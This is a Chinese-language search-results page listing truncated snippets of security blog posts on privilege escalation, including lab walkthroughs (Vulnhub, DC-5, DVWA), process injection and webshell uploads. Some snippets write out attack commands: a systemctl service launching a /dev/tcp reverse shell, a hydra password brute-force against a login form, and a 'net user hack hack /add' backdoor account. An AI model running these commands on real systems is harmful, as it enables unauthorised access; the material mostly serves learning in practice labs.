码迷,mamicode.com
首页 >  
搜索关键字:提权    ( 443个结果
CreateRemoteThread盲注提权原理分析
首先我们来看下进程程注入的核心逻辑(不考虑寻找目标进程、不考虑注入内容的执行) /* 注入恶意Payload: OpenProcess 可以打开目标进程 VirtualAllocEx 在目标进程中分配一块内存区域 WriteProcessMemory 在刚刚分配的内存区域中写入恶意的Payload ...
分类:其他好文   时间:2021-07-26 16:55:06    阅读次数:0
Vulnhub - Bluemoon
听说练习Vulnhub靶机,可以提升一些提权的小技巧,前来练习。 先使用nmap扫描一下,知道了靶机IP地址,以及开放的端口服务(ftp、ssh、http) 访问http服务看看有没有什么可以GetWebshell的点,但是有点空没啥可以利用的 于是使用dirsearch工具扫描后台目录,发现有一个 ...
分类:其他好文   时间:2021-06-05 18:03:23    阅读次数:0
suid-systemctl提权
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:其他好文   时间:2021-05-24 14:55:34    阅读次数:0
DVWA--Command Injection
Low 命令注入Low级别的,我们先看一下源码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping comma ...
分类:其他好文   时间:2021-05-03 12:31:22    阅读次数:0
20182217_刘洪宇 后门原理与实践 EXP2
1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 -- 下面是近些年的一些例子: 编译器:苹果Xcode后门事件。苹果Xcode后门事件中招的APP包括 ...
分类:其他好文   时间:2021-03-30 13:03:51    阅读次数:0
DC-5
DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin ...
分类:其他好文   时间:2021-03-16 11:54:54    阅读次数:0
四十二:漏洞发现-操作系统之漏洞探针类型利用修复
漏扫工具:Goby,Nmap,Nessus namp --script=vuln 默认nse插件 nmap vulscan vulners调用第三方库探针 nessus安装-使用-插件库加载器 在提权过程中需要通过掌握的信息来对系统、软件等存在的漏洞进行搜索,获取其利用的poc,通过编译后,实施提权 ...
分类:其他好文   时间:2021-02-06 12:10:45    阅读次数:0
实践文件上传漏洞拿下Linux服务器
一、文件上传漏洞介绍 Web应用程序中,提供用户上传各种文档、照片的文件等的接口。那么如果用户能够正常上传后端脚本文件(Webshell)并访问执行,就会造成文件上传漏洞。 二、Metasploit利用文件上传漏洞操作 三、Linux服务器提权案例演示 四、拿下DMZ服务器之后的思路 ...
分类:Web程序   时间:2021-02-02 11:30:29    阅读次数:0
os-hackos-3-docker提权
0x00 cewl http://192.168.43.179/websec/爬取页面所有的单词做成字典 hydra -l contact@hacknos.com -P cewl.txt 192.168.43.179 http-post-form "/websec/admin:username=^U ...
分类:其他好文   时间:2021-01-04 10:56:16    阅读次数:0
windows用户提权
使用命令给windows用户提权 创建与提权 功打开虚拟终端后,首先使用命令“ipconfig”,查看网站服务器的IP地址。 接下来,我们使用“whoami”命令查看当前用户。 然后使用“net user”命令,查看网站服务器上的用户账户。 使用命令“net user hack hack /add” ...
分类:Windows程序   时间:2020-12-15 11:42:41    阅读次数:6
443条   1 2 3 4 ... 45 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!